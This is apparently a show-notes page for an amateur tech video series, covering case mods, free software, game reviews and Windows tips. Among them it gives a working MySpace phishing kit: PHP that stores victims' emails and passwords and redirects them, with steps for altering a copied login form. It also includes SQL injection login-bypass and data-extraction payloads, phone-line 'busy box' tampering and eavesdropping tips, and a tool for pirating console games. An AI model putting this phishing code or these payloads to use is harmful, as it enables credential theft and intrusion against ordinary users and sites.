Step1

Step1 Show Notes

Step1 Season2 Episode1

Classic Arcade Games, Driving and Flight Simulators, DDR on a JumboTron, Play Guitar Hero II like a Rock Star, Halo Tournaments on a IMAX Screen, Over 30 Wii, PS3 n’ 360s… No not E3 we are talking about Otronicon.

 

Step1 Season1 Episode7

Step1 is back and in this episode Adrian shows you how to play "backed up" games on your Nintendo GameCube. Aaron is back with another game review. Danny makes those Lan parties that much easier with another add on to the case he has been working on. For programs that cost less then a penny Mark has 2 Apps. that will help you with your CD/DVD needs

 

Step1 Season1 Episode5

In this episode Danny shows you how to build a case and also mods the ever growing Step1 case. Daniel talks about an orical vonerbility. Aaron reviews 6 games quickly for the X360. Mark has yet another Program that cost less then a penny. Then Danny and Mark wrap it up with a recap of Otronicon 2006.

 

Step1 Season1 Episode4

In this episode of StepONE Jason and Daniel take the WiFi security a step farther and break everything they said would be safe. Mark has a huge office application package replacement for MS Office and Adobe acrobat. Adrian (the camera man) takes care of your LAN party needs by adding a handle to your case. Daniel and Jason are back with a real SQL injection and gets administrative privileges. Then Aaron wraps everything up with a way to improve you windows logon experience.

 

Step1 Season1 Episode3

In this episode of StepONE Aaron shows you what Selective Start-up is all about. Daniel is showing to a little more of the Phone Freaking world with a little Busy Boxing. Mark shows you a little something with Linux Run Levels. Daniel and Mark explain SQL injections and then displays an SQL injection. Daniel is joined with a new member of the cast (Jason) and together they show you how to secure your home wireless network. Plus Mark gives his review of AVG Anti-Virus (a free Anti-Virus).

 

Step1 Season1 Episode2

In this episode of StepONE Daniel kicks things off with a little be of beige boxing. Mark shows you how to take all the work out of playing games from your hard drive. Danny and Mark show you how to build a sweet HTPC. Daniel explains a cross site scripting volubility with IE. Danny is back with a case mod to the door of the project case.

 

Step1 Season1 Episode1

In this episode of StepONE Mark and Daniel perform a fresh install of Fedora Linux and then step up a Myspace.com Fishing attack. Danny shows you how to increase airflow inside your computer with just a pair of wire cutters. Arron shows how to use a common bit torrent client. Mark shows you a great program to use in place of Microsoft Windows MCE and then Mark and Danny review it on a kick ass home theater system.

 

Step1 - Season1 : Episode7


-Case Mod- Harness

Tools:
Scissors - Used to cut fabric
Sowing machine - Used to attach materials

Supplies:
Clips - to make harness removable
Particle board - to protect screen
Fabric - to cover particle board
Nylon - used for straps



-Soft Mod- Game Cube

Tools:
Max Drive Pro - Used to run apps... then those apps can be used to run games.
Mini DVD disks - Used to put your "backed up" games onto.

Link:
Max Drive Pro - http://us.codejunkies.com/shop/product.asp?l=1&r=0&c=US&cr=USD&cs=$&ProdID=297


Note: Game cube rocks so really buy games.



-Programs That Cost < a ¢- CD/DVD Apps

CDburner XPpro- CDBurnerXP Pro is an easy to use CD/DVD burning software, that can write CD-R and CD-RW discs. The program can also write disks directly from an ISO image file, and save image as an ISO image file (*.iso). You can create data and audio CDs, and it supports Burn-Proof technology, multi-session disks, import of ISO images and more. In addition to CD burning, you can also rip audio CDs, normalize WAV files, encode MP3 files, erase disks, and more. CDBurnerXP Pro does not require ASPI when used under for NT/2000/XP. The program can also convert .bin and .nrg (Nero) images to .ISO format.

ISO Recorder- ISO Recorder is a tool (power toy) for Windows XP, 2003 and now Windows Vista, that allows (depending on the Windows version) to burn CD and DVD images, copy disks, make images of the existing data CDs and DVDs and create ISO images from a content of a disk folder.

CDburner XPpro- http://www.cdburnerxp.se/
ISO Recorder- http://isorecorder.alexfeinman.com/isorecorder.htm



-Game Review-  X360 Game

360

Full Auto BUY IT



Step1 - Season1 : Episode5


-Case Mod- Acrylic

Tools:
Dremal - Used to cut plastic

Supplies:
Zip Ties - Used to hold components to the acrylic
1/4" Acrylic - Used to be the front and back of case
Bolts + Nuts - Used to hold the front piece of acrylic on
Conduit - Used to space the 2 pieces of acrylic



-Case Mod- Chassis Painting

Tools:
Spray Paint (color) - 3 Cans (Depending on case size)
Spray Paint (gloss) - 2 Cans (Depending on case size)

Note: Make sure you leave the painted case somewhere where dust or bugs wont get in the paint and get stuck.



-Programs That Cost < a ¢- StepMania

StepMania is a free, open source rhythm game for Windows, Mac, and Linux created by Chris Danford. It was originally developed as a simulator of Konami's popular arcade and console video game series, Dance Dance Revolution, and has since evolved into an extensible rhythm game engine capable of supporting a wide variety of rhythm-based game types. - Wikopedia.com

StepMania - http://stepmaniaonline.com/
USB Converter - http://www.stepmania.com/wiki/USBAdapters
StepMania Add-ons - http://www.stepmania.com/wiki/Download_Songs



-Security- Orical

Orical Bypass Awaiting An Email From Daniel.



-Game Review- 7 X360 Games

360 Release Lineup
 

Amped RENT
King Kong BAD GAME
Condemned BUY IT
NBA 2K6 BUY IT
Call Of Duty 2 BUY IT
FIFA '06 RENT
Madden '06 BUY IT
Perfect Dark: Zero RENT
Gun BUY IT




Step1 - Season1 : Episode4


-Network Tip- WiFi

Tools:
Kismet - Views non-broadcasted SSID's
Airsnort - Encryption key recovery tool



-Windows Tip- Super Start-up

PART 1
1. OPEN your start menu and CLICK run. (Windows Key + R)
2. TYPE [CONTROL USERPASSWORDS2] (leave brackets out) and then PRESS enter.
3. CLICK the user that you intend to use this with.
4. UNCHECK "Users must enter a username and password to use this computer." Then CLICK "Apply"
5. If you don’t want to use a password CLICK "Ok"

PART 2
1. RIGHT CLICK on the start menu and CLICK "Explore"(or open) then navigate to the start up folder for the user you picked earlier.
2. RIGHT CLICK within the window and CLICK "New" Then "Shortcut"
3. COPY [rundll32.exe user32.dll, LockWorkStation] and PASTE into the nice little white box then CLICK "Next >"
4. Name the shortcut [Example: mybabydaddy] then CLICK "finish"
5. REBOOT the computer and watch the magic



-Programs That Cost < a ¢- Office

Office Program Replacments:
Open Office 2.0 - Small download yet a large package of office programs. A must have for anyone that is not willing to drop 400 bucks on MS Office.
77MBs

Abiword - Decent replacement for Microsoft Word. Good program for people who do mainly word editing (e.g. gust0208's grandmother)
5MBs

Fox-it PDF Reader - Great light-weight PDF reader. No install needed, can be run from a flash drive
1.2MBs

Nvu - A great free HTML editor available for all major platforms... Doesn’t have all that FrontPage from MS has.
6.5MBs

Dia - A program that is very similar to MS Visio, it can draw entity relationship diagrams, UML diagrams, flowcharts, network diagrams, and simple circuits
.5MBs

PDFCreator - Easily creates PDF from any Windows program. Use it like a printer (shows up as a printer and then "prints" to a PDF file)
.5MBs



-SQL- Injections, Why they work
2.0

Not much more to explain this time except some definitions:
information_schema.tables - Holds information on all the tables in your database
information_schema.columns - Holds information on all the columns in your database
not in() - function used to narrow down your search results, skips over whatever is included in the parentheses.

Numeric Values:
Sometimes a value you want, won't return an error. That's because the error is caused by trying to convert a character to an integer. But when you try to convert an integer to an integer something odd happens... IT WORKS! So what you need to do is append the integer to add some characters. To do this you'll use the convert() function.
Ex: convert(int, password+ 'hoodajaba')
so if the password was 12345, it will now show the error message:
"...can not convert the varchar value '12345hoodajaba' to a column of data type int"


Step1 - Season1 : Episode3


-Windows Tip- Selective Start-up

Microsoft.com - Microsoft has a nice text based walkthrough of this.
Digg.com - The story on digg. this page.



-Phreaking- Busy box, Why it works

Box 1: What this does is short out the two lines, ring and tip. No electrical flow into the house, no dial tone. The line will work if someone connects anywhere on the "phone company" side of the box.

Box 2 (classic): This is the oldest and the best way. It sends ~9 volts into the phone line. Since "talking" voltage is ~10 volts it basically says "hey, someone is on the line". No matter where you try to hook up, this line should be busy.

Box 3: Same idea as Box 1, but a little more subtle. However this way, if a phone man hooks up at the box outside, he won't see a wire connecting the two prongs. He will hook up at the box outside, and get dial tone. The only thing he would be able to tell them is "Try un-hooking all the phones in your house one by one. One of the phones probably has a short, and that is ,most likely, the problem." Or he would just say, "It's an inside wiring problem, and your service plan doesn't cover this. I can continue, but it'll cost $80 for the first two hours, and $40 every hour after that."



-LINUX- Run Levels

Fedora Redhat - Fedora Redhat can be found on this page.
Run levels overview - A nice overview of run levels can be found on this page.



-SQL- Injections, Why they work

I'm just going to use a very simple/generic line of SQL to explain:

SELECT loginID FROM user_table WHERE (userName='$userName' AND Password='$Password');

This is grabbing the loginID from the table "user_table" as long as the username, and password match.

Now, take the injection: hola' or 1=1--

Note: "--" is a single line comment, it basically tells the interpreter, "Forget about the rest of this crap."

So here is the line of code as read by the interpreter:

SELECT loginID FROM user_table WHERE (userName='hola' or 1=1--' AND Password='$Password');

Obviously the username isn't hola, and even if it is... it doesn't matter. It's the "or 1=1" that we're interested in. It's saying "Grab loginID from user_table where the username is hola, or if 1=1." Since 1 always equals 1, it grabs the first loginID from the top of the table. And since you added the comment, it ignores the rest of that line, and follows the rest of the script to log you in.



-Programs That Cost < a ¢- AVG

AVG Free Edition - Get AVG and everything for it here
AVG Not So Free - If you wish to pay for AVG go here.


Step1 - Season1 : Episode2


-Phone Phreaking-

Phone: $5- Wal-Mart
Alligator clips: $1.89 Home Depot
Splices: $.89 Home Depot
Listening to your neighbor talk about his VD: priceless



-Daemon Tools-

Daemon Tools/ - Get Daemon Tools and everything for it here
Alcohol 120% - Another CD/DVD emulation program.


Step1 - Season1 : Episode1


-LINUX SHOW NOTES-

http://fedora.redhat.com/ - Get the OS here.
http://www.linuxforums.org/ - Get the help here.
http://www.linuxiso.org/ - Get The Other Distros Here.




MYSPACE PHISHING SHOW NOTES

/*PHP for myspace phishing*/

<?

/*
Bear in mind that I wrote this in about 5 minutes,
so this script has NO input validation. So don't
use a database that holds important information.
Because if you piss the wrong person off, youll probably find
the whole thing gone... so then I guess you wouldn't find it... oh well...
you get the point.

*/



//your Database username
$username = "yourusername";


//your Database password
$password = "yourpassword";

//Database host
$dbhost = "hostname:port";



//calling email from the "email" input posted from the form
$email = $_POST["email"];



//calling password...
$pass = $_POST["password"];


//opening the connection to your DB, and printing the message if connection fails.
$conn = @mysql_connect("$dbhost", "$username", "$password") or die("Due to heavy traffic on the server, your informtation could not be processed.");



//tells which DB to select
mysql_select_db ("your database");


//sql query that saves entered info into the DB
$sql = "INSERT INTO sucker (Email, Password) VALUES ('$email', '$pass')";



//checks to make sure that everything worked out, if it does then it redirects the victim to myspace, if not it redirects them to your page.
if(mysql_query($sql, $conn))
{
header ("Location: http://www.myspace.com/");
}
else
{
header ("Location: http://your.site.here/");
}



//close the connection
mysql_close($conn);
?>



<!--Excerpt of Myspace Source-->

<h2>Member Login</h2>
<form action="index.cfm?fuseaction=login.process" method="post" name="theForm" id="theForm">
<table>
<tr class="loginElement">
<td class="label"><label for="email">E-Mail:</label></td>
<td class="input"><input type="text" name="email" id="email"/></td>
</tr>
<tr class="loginElement">
<td class="label"><label for="password">Password:</label></td>
<td class="input"><input name="password" type="password" id="password"/></td>




This is the important part of the myspace homepage right where it says: action="index.cfm?fuseaction=login.process"



You need to change that to action="addemail.php" or whatever you happen to name your file.



-MEDIA PORTAL-

http://mediaportal.sourceforge.net/ - Get media portal and everything for it here.
http://www.logitech.com - The logitech set featured on this segment.



-Fan Grill Mod-

Wear safty glasses.